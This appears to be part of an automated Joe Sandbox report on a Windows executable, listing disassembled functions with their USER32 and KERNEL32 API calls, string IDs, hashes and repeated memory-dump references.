                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Create$IndirectObject$Intersect$Empty$CurrentModeSelect$CombineH_prologMove$ClientFill$BeginBrushClipColorCopyFontLinePaintScrollSolidwsprintf
                                    • String ID: pTL
                                    • API String ID: 2506852199-168633513
                                    • Opcode ID: cb033b505ab1316746293166c1a3a38c0fb3801c4d6b98ed056ee4c4a8f6ab24
                                    • Instruction ID: d2de053ded7268b9f9fdcb53d722133c41dc83cabb2f61b19ae396333c7eeb03
                                    • Opcode Fuzzy Hash: cb033b505ab1316746293166c1a3a38c0fb3801c4d6b98ed056ee4c4a8f6ab24
                                    • Instruction Fuzzy Hash: B3D259B56083809FD364DF25C985FAFB7E9BBC8704F00891EF58A83251DB74A905CB66
                                    Function 004292C0 Relevance: 53.5, APIs: 29, Strings: 1, Instructions: 979windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(?), ref: 00429332
                                    • IsIconic.USER32(?), ref: 0042936A
                                    • SetActiveWindow.USER32(?,?,?), ref: 00429393
                                    • IsWindow.USER32(?), ref: 004293BD
                                    • IsWindow.USER32(?), ref: 0042968E
                                    • DestroyAcceleratorTable.USER32(?), ref: 004297DE
                                    • DestroyMenu.USER32(?), ref: 004297E9
                                    • DestroyAcceleratorTable.USER32(?), ref: 00429803
                                    • DestroyMenu.USER32(?), ref: 00429812
                                    • DestroyAcceleratorTable.USER32(?), ref: 00429872
                                    • DestroyMenu.USER32(?,000003EA,00000000,00000000,?,?,00000000,?,000007D9,00000000,00000000), ref: 00429881
                                    • SetParent.USER32(?,?), ref: 00429903
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?), ref: 00429A1B
                                    • IsWindow.USER32(?), ref: 00429B4C
                                    • SendMessageA.USER32(?,0000806F,00000000,00000000), ref: 00429B61
                                    • SendMessageA.USER32(?,00008004,00000000,00000000), ref: 00429B7E
                                    • DestroyAcceleratorTable.USER32(?), ref: 00429BCC
                                    • IsWindow.USER32(?), ref: 00429C41
                                    • IsWindow.USER32(?), ref: 00429C91
                                    • IsWindow.USER32(?), ref: 00429CE1
                                    • IsWindow.USER32(?), ref: 00429D1E
                                    • IsWindow.USER32(?), ref: 00429DA1
                                    • GetParent.USER32(?), ref: 00429DAF
                                    • GetFocus.USER32 ref: 00429DF0
                                      • Part of subcall function 004291B0: IsWindow.USER32(?), ref: 0042922B
                                      • Part of subcall function 004291B0: GetFocus.USER32 ref: 00429235
                                      • Part of subcall function 004291B0: IsChild.USER32(?,00000000), ref: 00429247
                                    • IsWindow.USER32(?), ref: 00429E4F
                                    • SendMessageA.USER32(?,00008076,00000000,00000000), ref: 00429E64
                                    • IsWindow.USER32(00000000), ref: 00429E77
                                    • GetFocus.USER32 ref: 00429E81
                                    • SetFocus.USER32(00000000), ref: 00429E8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Destroy$AcceleratorFocusTable$MenuMessageSend$Parent$ActiveChildIconic
                                    • String ID: d
                                    • API String ID: 3681805233-2564639436
                                    • Opcode ID: e87a3fc29fcbea10c2aeaee14bba0306c1351c891291a1a06558fd05f4f9e5bf
                                    • Instruction ID: bccc638afaa4ac9f0b6628bff1f31bfaa2a79839a7b447135e494ceec8457570
                                    • Opcode Fuzzy Hash: e87a3fc29fcbea10c2aeaee14bba0306c1351c891291a1a06558fd05f4f9e5bf
                                    • Instruction Fuzzy Hash: 457289716043519BD320EF25E880B6FB7E9AF88704F54492EF94997341DB38EC45CBAA
                                    Function 00431920 Relevance: 50.0, APIs: 23, Strings: 5, Instructions: 986windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowEnabled.USER32(?), ref: 00431959
                                    • TranslateAccelerator.USER32(?,?,?), ref: 004319B3
                                    • IsChild.USER32(?,?), ref: 004319E4
                                    • GetFocus.USER32 ref: 00431B3F
                                    • PostMessageA.USER32(?,000000A1,00000002,00000000), ref: 00431BC9
                                    • PostMessageA.USER32(?,000000A1,00000002,00000000), ref: 00431C38
                                    • IsChild.USER32(?,00000000), ref: 00431CE1
                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00431CB2
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    • IsWindow.USER32(?), ref: 004325B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ChildMessage$PostWindow$AcceleratorEnabledFocusParentSendTranslate
                                    • String ID: 0$9$A$Z$hlp
                                    • API String ID: 3372979518-114186910
                                    • Opcode ID: 0f55ff760e6b3e40c6da52bc767bf589934480f50a4d999177b276bd593de1c4
                                    • Instruction ID: a3fde701ff64b052509432ab22a5561929a7d46fabc4da07dc5bb46c27768338
                                    • Opcode Fuzzy Hash: 0f55ff760e6b3e40c6da52bc767bf589934480f50a4d999177b276bd593de1c4
                                    • Instruction Fuzzy Hash: 4872C1706043419BEB24DF24C991BABB3E4AF88704F10192FF94697391DB78ED45CB6A
                                    Function 004B783A Relevance: 27.9, Strings: 22, Instructions: 417COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e$n]
                                    • API String ID: 0-2485170652
                                    • Opcode ID: bc8863562cd63b47be5c68d16e4a16415af0bb7440cbed4e108292fb2e0a5c69
                                    • Instruction ID: 9dc91882277d9f3a72de3379226257b71765dbb069ace20db160ba22b7db4824
                                    • Opcode Fuzzy Hash: bc8863562cd63b47be5c68d16e4a16415af0bb7440cbed4e108292fb2e0a5c69
                                    • Instruction Fuzzy Hash: 38E1EE30D5D2099EEF258F68C8157FE7BB1FB94308F28405BD441A6282D77C9A82DB79
                                    Function 00432B10 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 93libraryloaderwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsIconic.USER32(?), ref: 00432B1C
                                    • IsZoomed.USER32(?), ref: 00432B2A
                                    • LoadLibraryA.KERNEL32(User32.dll,00000003,00000009), ref: 00432B54
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00432B67
                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00432B75
                                    • FreeLibrary.KERNEL32(00000000), ref: 00432BAB
                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00432BC1
                                    • IsWindow.USER32(?), ref: 00432BEE
                                    • ShowWindow.USER32(?,00000005,?,?,?,?,00000004), ref: 00432BFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressLibraryProcWindow$FreeIconicInfoLoadParametersShowSystemZoomed
                                    • String ID: GetMonitorInfoA$H$MonitorFromWindow$User32.dll
                                    • API String ID: 447426925-661446951
                                    • Opcode ID: 3b97d3e644612fe363b93e0eb0b50ac682f4af31a2ebda8b893ca15921ddcfb6
                                    • Instruction ID: 7f2ac038bd2d31b09cfce74ed2631c40ecbd3596fd08124acce7addb461452f5
                                    • Opcode Fuzzy Hash: 3b97d3e644612fe363b93e0eb0b50ac682f4af31a2ebda8b893ca15921ddcfb6
                                    • Instruction Fuzzy Hash: 04315071700301AFD7549F65DD49F6BB7A8EF88B51F00852DFA0197290EBB8E8058B69
                                    Function 0042B630 Relevance: 18.3, APIs: 12, Instructions: 273threadwindownetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 0042B655
                                    • IsWindow.USER32(00010444), ref: 0042B671
                                    • SendMessageA.USER32(00010444,000083E7,?,00000000), ref: 0042B68A
                                    • ExitProcess.KERNEL32 ref: 0042B69F
                                    • FreeLibrary.KERNEL32(00000000), ref: 0042B783
                                    • FreeLibrary.KERNEL32 ref: 0042B7D7
                                    • DestroyCursor.USER32(0001044D), ref: 0042B827
                                    • DestroyCursor.USER32(0001044F), ref: 0042B83E
                                    • IsWindow.USER32(00010444), ref: 0042B855
                                    • DestroyCursor.USER32(?), ref: 0042B904
                                    • WSACleanup.WS2_32 ref: 0042B94F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDestroy$FreeLibraryWindow$CleanupCurrentExitMessageProcessSendThread
                                    • String ID:
                                    • API String ID: 2560087610-0
                                    • Opcode ID: 0a4a7a849c15d22bd8664f7ebad6e976fdfcac5c23d335b0e0f0ba3a915df99d
                                    • Instruction ID: 0b2dd4f20ebe15ecfa3e858e282a9ca4417d797460f0035a8a180f680c79ec7a
                                    • Opcode Fuzzy Hash: 0a4a7a849c15d22bd8664f7ebad6e976fdfcac5c23d335b0e0f0ba3a915df99d
                                    • Instruction Fuzzy Hash: 9DB16B707007129BC724EF65D9C5BABB7E8FF88304F90452EE59A87251CB34A981CB99
                                    Function 0042B220 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 310libraryregistryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B304
                                    • LoadLibraryA.KERNEL32(?,00000000,00000000,00000000,?,?,005BDD18,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B341
                                    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 0042B377
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B382
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,005DF380,00000000), ref: 0042B390
                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0042B49D
                                    • RegisterTypeLib.OLEAUT32(00000000,00000000), ref: 0042B4D2
                                    • UnRegisterTypeLib.OLEAUT32(?,00000000,00000000,00000000,00000001), ref: 0042B5B3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Library$LoadType$FreeRegister$AddressProc
                                    • String ID: DllRegisterServer$DllUnregisterServer
                                    • API String ID: 3854050662-2931954178
                                    • Opcode ID: 56a62f79e5bb7b8018905c1d8112b0badcf0139f0c3876621e0cd81a5a49d142
                                    • Instruction ID: 76d69a9f861e45228f9a270b00dcf8b9d0853e10be80916bdc3fc6a9249d7692
                                    • Opcode Fuzzy Hash: 56a62f79e5bb7b8018905c1d8112b0badcf0139f0c3876621e0cd81a5a49d142
                                    • Instruction Fuzzy Hash: CBB1C771A00219ABDB10EFA5DC85FEEB778EF44318F14851EF815A7281DB38AA05C7A5
                                    Function 004122D0 Relevance: 17.3, APIs: 11, Instructions: 840COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e72fab869b7830de43de657770806bae53d07d8b936d09fafce9cd7235fa3e36
                                    • Instruction ID: 8c6d8a1bb802cc77c7d8300e25974a1a2ad45b78ae07d474c78f121c11565c88
                                    • Opcode Fuzzy Hash: e72fab869b7830de43de657770806bae53d07d8b936d09fafce9cd7235fa3e36
                                    • Instruction Fuzzy Hash: 9D629374A002168FCB24CF58C980AEEB7B5FF48310F24855EE955DB350E7B89D91CB9A
                                    Function 0042E740 Relevance: 15.4, APIs: 10, Instructions: 430COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7cd25bca39a44b7981de839c7ec6c5e56b393834db2e7c3c93848204de438dca
                                    • Instruction ID: 0b69258b78a94232ea45e90751ebba9429014fc21b44ed921dac73b9a2ed8979
                                    • Opcode Fuzzy Hash: 7cd25bca39a44b7981de839c7ec6c5e56b393834db2e7c3c93848204de438dca
                                    • Instruction Fuzzy Hash: 07C1E3767046248FE350EF2AEC81A6BB394FB84314F904D2FE546C7342D73AE9168799
                                    Function 004BD591 Relevance: 13.6, APIs: 9, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BD596
                                    • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004BD5CE
                                    • LoadResource.KERNEL32(?,00000000,?,?,?,00000000), ref: 004BD5D6
                                      • Part of subcall function 004BE3D0: UnhookWindowsHookEx.USER32(?), ref: 004BE3F5
                                    • LockResource.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 004BD5E3
                                    • IsWindowEnabled.USER32(?), ref: 004BD616
                                    • EnableWindow.USER32(?,00000000), ref: 004BD624
                                    • EnableWindow.USER32(?,00000001), ref: 004BD6B2
                                    • GetActiveWindow.USER32 ref: 004BD6BD
                                    • SetActiveWindow.USER32(?,?,?,00000000,?,?,?,00000000), ref: 004BD6CB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
